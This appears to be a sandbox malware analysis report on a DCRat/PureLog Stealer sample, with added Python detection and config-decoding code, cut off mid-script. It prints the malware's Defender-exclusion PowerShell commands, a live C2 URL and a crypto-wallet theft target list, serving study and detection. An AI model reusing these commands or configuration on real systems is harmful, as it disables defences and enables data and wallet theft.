
Windows Analysis Report
hz7DzW2Yop.exe

Overview

General Information

Sample name: hz7DzW2Yop.exe (renamed because the original name is a hash value)
Original sample name: 46dcddd43cbaeae845c14e7306726ff2.exe
Analysis ID: 1587336
MD5: 46dcddd43cbaeae845c14e7306726ff2
SHA1: 4952a7cd01795d736450074433337d2a544b1e50
SHA256: ab98b91a647e45e348db97bd277efcc122d10d45a5891bfac3d627f3a865b580
Tags: DCRat, exe, user-abuse_ch

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates processes via WMI
Drops executables to the windows directory (C:\Windows) and starts them
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious execution chain found
Tries to harvest and steal browser information (history, passwords, etc)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Process Tree

  • System is w10x64
  • hz7DzW2Yop.exe (PID: 7316 cmdline: "C:\Users\user\Desktop\hz7DzW2Yop.exe" MD5: 46DCDDD43CBAEAE845C14E7306726FF2)
    • wscript.exe (PID: 7364 cmdline: "C:\Windows\System32\WScript.exe" "C:\HyperWebbroker\kC1qNwulObrDTKeFv7nRu.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 7520 cmdline: C:\Windows\system32\cmd.exe /c ""C:\HyperWebbroker\lGnbJpj21JH90uguTRu2sUXatfulFm1f34jhZ8QO993nz73C1NZz.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • serverBrokerperfMonitor.exe (PID: 7580 cmdline: "C:\HyperWebbroker/serverBrokerperfMonitor.exe" MD5: C1CF39EF49B82B35938CA7A45DBCCEEE)
          • powershell.exe (PID: 7996 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\en-GB\uAsLgsGzSk.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 8012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 8004 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\uAsLgsGzSk.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 8032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 8020 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ShellExperiences\uAsLgsGzSk.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WmiPrvSE.exe (PID: 7704 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • powershell.exe (PID: 8068 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\SystemSettings.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 8128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 8120 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\uAsLgsGzSk.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6644 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2K3wfCcSpW.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 4048 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • w32tm.exe (PID: 396 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
            • uAsLgsGzSk.exe (PID: 7860 cmdline: "C:\Windows\ShellExperiences\uAsLgsGzSk.exe" MD5: C1CF39EF49B82B35938CA7A45DBCCEEE)
  • uAsLgsGzSk.exe (PID: 1868 cmdline: C:\Recovery\uAsLgsGzSk.exe MD5: C1CF39EF49B82B35938CA7A45DBCCEEE)
  • uAsLgsGzSk.exe (PID: 5344 cmdline: C:\Recovery\uAsLgsGzSk.exe MD5: C1CF39EF49B82B35938CA7A45DBCCEEE)
  • svchost.exe (PID: 7540 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

Malware Configuration

DCRat (extracted from memory dump 00000005.00000002.1930693014.00000000137F7000.00000004.00000800.00020000.00000000.sdmp):
{"C2 url": "http://89.23.100.242/5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Yara Overview

Initial Sample

Source | Rule | Description | Author
hz7DzW2Yop.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
hz7DzW2Yop.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security

Dropped Files

Source | Rule | Description | Author
C:\Program Files (x86)\Windows Defender\en-GB\uAsLgsGzSk.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
C:\Program Files (x86)\Windows Defender\en-GB\uAsLgsGzSk.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
C:\Program Files (x86)\Windows Defender\en-GB\uAsLgsGzSk.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
C:\Program Files (x86)\Windows Defender\en-GB\uAsLgsGzSk.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
C:\Recovery\SystemSettings.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
(5 further entries not shown)

Memory Dumps

Source | Rule | Description | Author
00000000.00000003.1669057871.000000000620B000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000000.00000003.1669587198.0000000006A09000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
00000005.00000002.1930693014.00000000137F7000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
0000002A.00000002.3042679176.000000000314D000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security
00000005.00000000.1829997271.0000000000FE2000.00000002.00000001.01000000.0000000A.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
(2 further entries not shown)

Unpacked PEs

Source | Rule | Description | Author
0.3.hz7DzW2Yop.exe.6a4eee9.1.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
0.3.hz7DzW2Yop.exe.6a4eee9.1.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
0.3.hz7DzW2Yop.exe.6250ee9.0.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
0.3.hz7DzW2Yop.exe.6250ee9.0.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
5.0.serverBrokerperfMonitor.exe.fe0000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security
(5 further entries not shown)

                                    System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\en-GB\uAsLgsGzSk.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\en-GB\uAsLgsGzSk.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\HyperWebbroker/serverBrokerperfMonitor.exe", ParentImage: C:\HyperWebbroker\serverBrokerperfMonitor.exe, ParentProcessId: 7580, ParentProcessName: serverBrokerperfMonitor.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\en-GB\uAsLgsGzSk.exe', ProcessId: 7996, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\en-GB\uAsLgsGzSk.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\en-GB\uAsLgsGzSk.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\HyperWebbroker/serverBrokerperfMonitor.exe", ParentImage: C:\HyperWebbroker\serverBrokerperfMonitor.exe, ParentProcessId: 7580, ParentProcessName: serverBrokerperfMonitor.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\en-GB\uAsLgsGzSk.exe', ProcessId: 7996, ProcessName: powershell.exe
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\HyperWebbroker\kC1qNwulObrDTKeFv7nRu.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\HyperWebbroker\kC1qNwulObrDTKeFv7nRu.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\hz7DzW2Yop.exe", ParentImage: C:\Users\user\Desktop\hz7DzW2Yop.exe, ParentProcessId: 7316, ParentProcessName: hz7DzW2Yop.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\HyperWebbroker\kC1qNwulObrDTKeFv7nRu.vbe" , ProcessId: 7364, ProcessName: wscript.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\en-GB\uAsLgsGzSk.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\en-GB\uAsLgsGzSk.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\HyperWebbroker/serverBrokerperfMonitor.exe", ParentImage: C:\HyperWebbroker\serverBrokerperfMonitor.exe, ParentProcessId: 7580, ParentProcessName: serverBrokerperfMonitor.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\en-GB\uAsLgsGzSk.exe', ProcessId: 7996, ProcessName: powershell.exe
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7540, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-10T07:57:31.379268+0100 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 89.23.100.242 | 80 | TCP
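The Sigma hits and the process tree above show the chain an analyst would want to alert on: wscript.exe running a .vbe from C:\HyperWebbroker, PowerShell adding Defender exclusions for specific file paths, and the excluded binary then executing from C:\Windows\ShellExperiences. The block below is an added example, not Joe Sandbox's signatures and not the Sigma rules themselves. It runs equivalent checks over constructed process-creation events copied from the tree (PIDs 4242 and 9001, a benign control and an -EncodedCommand variant, are made up for the example), correlates exclusions against later executions, and re-implements the base64offset matching that Sigma uses to catch the cmdlet inside base64-encoded PowerShell.

```python
"""Detection logic for the Sigma hits above, run over constructed
process-creation events that mirror this report's process tree."""
from __future__ import annotations

import base64
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the new process (Sysmon "Image")
    cmdline: str    # its command line


def base64offset_variants(needle: bytes) -> list[str]:
    """The three base64 spellings of `needle` at byte offsets 0, 1 and 2,
    trimmed to the characters that depend only on `needle`. Any base64 stream
    containing `needle` contains one of them; this is what the Sigma
    `base64offset` modifier expands to (re-implemented here, not Sigma's code)."""
    start = (0, 2, 3)                 # leading chars polluted by the pad bytes
    end = {0: None, 1: -3, 2: -2}     # trailing chars polluted by the partial byte / '='
    variants = []
    for i in range(3):
        enc = base64.b64encode(b" " * i + needle).decode()
        variants.append(enc[start[i]:end[(len(needle) + i) % 3]])
    return variants


# PowerShell -EncodedCommand takes base64 of UTF-16LE text, so match that form.
MPPREF_B64 = base64offset_variants("Add-MpPreference".encode("utf-16le"))
EXCLUSION_RE = re.compile(
    r'''Add-MpPreference\b.*?-Exclusion(?:Path|Extension|Process)\s+['"]?([^'"]+)''', re.I)
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_FILE_RE = re.compile(r"\.(?:vbe|vbs|js|jse|wsf)\b", re.I)


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: list[ProcEvent]) -> list[tuple[int, str]]:
    """Return (pid, rule) pairs. Pass 1 finds the primitives; pass 2 correlates
    every execution against the Defender exclusions collected in pass 1, so the
    order of events in the log does not matter."""
    hits: list[tuple[int, str]] = []
    excluded: set[str] = set()
    for ev in events:
        name = _basename(ev.image)
        if name in ("powershell.exe", "pwsh.exe"):
            m = EXCLUSION_RE.search(ev.cmdline)
            if m:
                hits.append((ev.pid, "defender_exclusion"))
                excluded.add(m.group(1).strip().lower())
            enc = ENCODED_RE.search(ev.cmdline)
            if enc and any(v in enc.group(1) for v in MPPREF_B64):
                hits.append((ev.pid, "defender_exclusion_b64"))
        if name in SCRIPT_HOSTS and SCRIPT_FILE_RE.search(ev.cmdline):
            hits.append((ev.pid, "script_host_script_file"))
    for ev in events:
        img = ev.image.lower()
        if any(img == p or img.startswith(p.rstrip("\\") + "\\") for p in excluded):
            hits.append((ev.pid, "exec_from_excluded_path"))
    return hits


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"


def _mppref(path: str) -> str:
    return f"\"powershell\" -Command Add-MpPreference -ExclusionPath '{path}'"


_ENCODED = base64.b64encode(
    "Add-MpPreference -ExclusionPath 'C:\\Users\\Public'".encode("utf-16le")).decode()

# Constructed events mirroring the report's process tree (not real telemetry).
# PIDs 9001 (encoded variant) and 4242 (benign control) are invented.
SAMPLE_EVENTS = [
    ProcEvent(7316, 1, r"C:\Users\user\Desktop\hz7DzW2Yop.exe", r'"C:\Users\user\Desktop\hz7DzW2Yop.exe"'),
    ProcEvent(7364, 7316, r"C:\Windows\SysWOW64\wscript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\HyperWebbroker\kC1qNwulObrDTKeFv7nRu.vbe" '),
    ProcEvent(7520, 7364, r"C:\Windows\system32\cmd.exe",
              r'C:\Windows\system32\cmd.exe /c ""C:\HyperWebbroker\lGnbJpj21JH90uguTRu2sUXatfulFm1f34jhZ8QO993nz73C1NZz.bat" "'),
    ProcEvent(7580, 7520, r"C:\HyperWebbroker\serverBrokerperfMonitor.exe",
              r'"C:\HyperWebbroker/serverBrokerperfMonitor.exe"'),
    ProcEvent(7996, 7580, PS, _mppref(r"C:\Program Files (x86)\windows defender\en-GB\uAsLgsGzSk.exe")),
    ProcEvent(8020, 7580, PS, _mppref(r"C:\Windows\ShellExperiences\uAsLgsGzSk.exe")),
    ProcEvent(7860, 6644, r"C:\Windows\ShellExperiences\uAsLgsGzSk.exe", r'"C:\Windows\ShellExperiences\uAsLgsGzSk.exe"'),
    ProcEvent(9001, 7580, PS, "powershell -NoP -EncodedCommand " + _ENCODED),
    ProcEvent(4242, 1, r"C:\Windows\System32\notepad.exe", r'"C:\Windows\System32\notepad.exe"'),
]


def run_sample() -> list[tuple[int, str]]:
    return detect(SAMPLE_EVENTS)


if __name__ == "__main__":
    for pid, rule in run_sample():
        print(pid, rule)
```

The second pass is the part worth keeping in a real pipeline: an Add-MpPreference call on its own is noisy on admin workstations, but a binary starting from a path that was excluded minutes earlier by a non-interactive PowerShell parent is the sequence this sample shows and is rarely legitimate.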



                                    AV Detection

Source: hz7DzW2Yop.exe | Avira: detected
Source: C:\Program Files (x86)\Windows Defender\en-GB\uAsLgsGzSk.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Recovery\SystemSettings.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\HyperWebbroker\kC1qNwulObrDTKeFv7nRu.vbe | Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Users\user\Desktop\cIDyHnkk.log | Avira: detection malicious, Label: TR/Agent.jbwuj
Source: C:\Program Files (x86)\Windows Defender\en-GB\uAsLgsGzSk.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\FyhuXVvF.log | Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\AppData\Local\Temp\2K3wfCcSpW.bat | Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\hnxxzxgb.log | Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: 00000005.00000002.1930693014.00000000137F7000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: DCRat {"C2 url": "http://89.23.100.242/5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | ReversingLabs: Detection: 68%
Source: C:\Program Files (x86)\Windows Defender\en-GB\uAsLgsGzSk.exe | ReversingLabs: Detection: 68%
Source: C:\Recovery\SystemSettings.exe | ReversingLabs: Detection: 68%
Source: C:\Recovery\uAsLgsGzSk.exe | ReversingLabs: Detection: 68%
Source: C:\Users\user\Desktop\CvvLBlqK.log | ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\FyhuXVvF.log | ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\GvICsVKA.log | ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\IitSDvGY.log | ReversingLabs: Detection: 15%
Source: C:\Users\user\Desktop\NVLRgsWM.log | ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\cIDyHnkk.log | ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\eIxzTFKJ.log | ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\hnxxzxgb.log | ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\htcPaTVC.log | ReversingLabs: Detection: 15%
Source: C:\Users\user\Desktop\maPwcuvP.log | ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\qTMMgMAe.log | ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\vPOensqX.log | ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\zHJVyCcw.log | ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\zIxCDFUn.log | ReversingLabs: Detection: 37%
Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exe | ReversingLabs: Detection: 68%
Source: hz7DzW2Yop.exe | ReversingLabs: Detection: 68%
Source: hz7DzW2Yop.exe | Virustotal: Detection: 59%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Users\user\Desktop\LqKTzAAu.log | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Defender\en-GB\uAsLgsGzSk.exe | Joe Sandbox ML: detected
Source: C:\Recovery\SystemSettings.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\IitSDvGY.log | Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Defender\en-GB\uAsLgsGzSk.exe | Joe Sandbox ML: detected
Source: C:\HyperWebbroker\serverBrokerperfMonitor.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\NVLRgsWM.log | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\HupKRiKa.log | Joe Sandbox ML: detected
Source: hz7DzW2Yop.exe | Joe Sandbox ML: detected
Source: 0000002A.00000002.3042679176.000000000314D000.00000004.00000800.00020000.00000000.sdmp | String decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Smart","_1":"False","_2":"False","_3":"False"},"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"All Users","_3":"True"},"d1159ac1-2243-45e3-9bad-55df4f7732e9":{"_0":"crypto;bank;authorization;account","_1":"1500","_2":"15","_3":"True"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds","_1":""}}
Source: 0000002A.00000002.3042679176.000000000314D000.00000004.00000800.00020000.00000000.sdmp | String decryptor: ["A304AdlgYtYJeVPUZrJwxZFWxXLmbzyDZ0TzYWTLbOkpi6jNBNaa6qulyeGnR9Fj5VtnCa6CX8Viyax1y8kNZYGtGrB3Qq3bJBtMN5KlRXC8UMxXrPySZ1KgP9hUYDwq","bd9da7f16f55026e79d340b5ea02a5a7f7e28b00743a65fca34947ef8d4bc1c2","0","SUDO","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVW93WTI1V2JFbHBkMmxQUTBrMlNXNVNlV1JYVldsTVEwazFTV3B2YVdSSVNqRmFVMGx6U1dwRmQwbHFiMmxrU0VveFdsTkpjMGxxUlhoSmFtOXBaRWhLTVZwVFNYTkpha1Y1U1dwdmFXUklTakZhVTBselNXcEZla2xxYjJsa1NFb3hXbE5KYzBscVJUQkphbTlwWkVoS01WcFRTamtpWFE9PSJd"]
Source: 0000002A.00000002.3042679176.000000000314D000.00000004.00000800.00020000.00000000.sdmp | String decryptor: [["http://89.23.100.242/5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/","imageJavascriptprocessDefaultsqltest"]]
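The string-decryptor output above is layered: the last two entries of the second list are base64 of JSON arrays, and the longer one wraps a second base64 array whose third element is, in turn, base64 of the Params object shown in the extracted configuration. The third entry splits the C2 URL into a base path and an endpoint name. The block below is an added example (not Joe Sandbox's extractor and not DCRat code) that peels such layers generically, stopping at values that are not base64-encoded JSON, and rebuilds the check-in URL from the split string. The blobs are copied from this report; the ".php" suffix is not in the configuration and is taken from the POST request captured in the Networking section, so it is passed in explicitly rather than assumed.

```python
"""Unwrap the layered base64/JSON strings recovered by the string decryptor
above and rebuild the check-in URL from the split C2 string."""
from __future__ import annotations

import base64
import json
from typing import Any

# Copied from the string-decryptor output in this report.
SHORT_BLOB = "WyIxIiwiIiwiNSJd"
NESTED_BLOB = (
    "WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VX"
    "TjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpF"
    "aEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NF"
    "b3hXbE5KYzBscVkybFBhVW93WTI1V2JFbHBkMmxQUTBrMlNXNVNlV1JYVldsTVEwazFTV3B2YVdSSVNq"
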